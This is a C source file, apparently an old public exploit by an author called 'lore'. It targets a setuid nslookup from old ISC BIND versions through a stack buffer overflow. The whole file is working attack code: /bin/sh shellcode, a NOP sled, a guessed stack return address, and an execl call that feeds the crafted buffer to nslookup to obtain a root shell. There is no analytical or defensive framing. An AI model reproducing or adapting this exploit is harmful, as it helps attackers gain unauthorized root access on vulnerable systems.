/*
 *  nslookup.c exploit
 *  lore
 * 
 *  wrote this one about a year ago, so it only works with old
 *  versions of the ISC bind package.
 *
 *  Note: nslookup has to be suid
 */

#include <stdio.h>
#include <stdlib.h>

/* Must use shell code without '\0' like this, or sscanf will chop it in half */

char hellcode[] =
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
  "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
  "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
  "\xff\xff/bin/sh.........";

#define BSIZE  (256)
#define ESIZE  ((BSIZE + 8))
#define PATH   ("/usr/bin/nslookup")
#define OFFSET (400)
#define NOP    (0x90)

long get_esp (void)
{
  __asm__("movl %esp, %eax");
}

int main (int argc, char * * argv)
{
  int offset, i, j;
  long addr;
  char * evil;

  evil = (char *)malloc(ESIZE);
  offset = OFFSET;

  for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
    evil[i] = NOP;

  for (j = 0; i < (ESIZE - 4); ++j, ++i)
    evil[i] = hellcode[j];

  if (argc > 1) offset = atoi(argv[1]);

  addr = (get_esp() - offset);

  *(long *)(evil + i) = addr;


  fprintf(stderr, "nslookup exploit, lore\n");
  fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset);
  fprintf(stderr,
          "You might go into a rootshell after you get unspecified error.\n\n");

  execl(PATH, "nslookup", evil, NULL);
}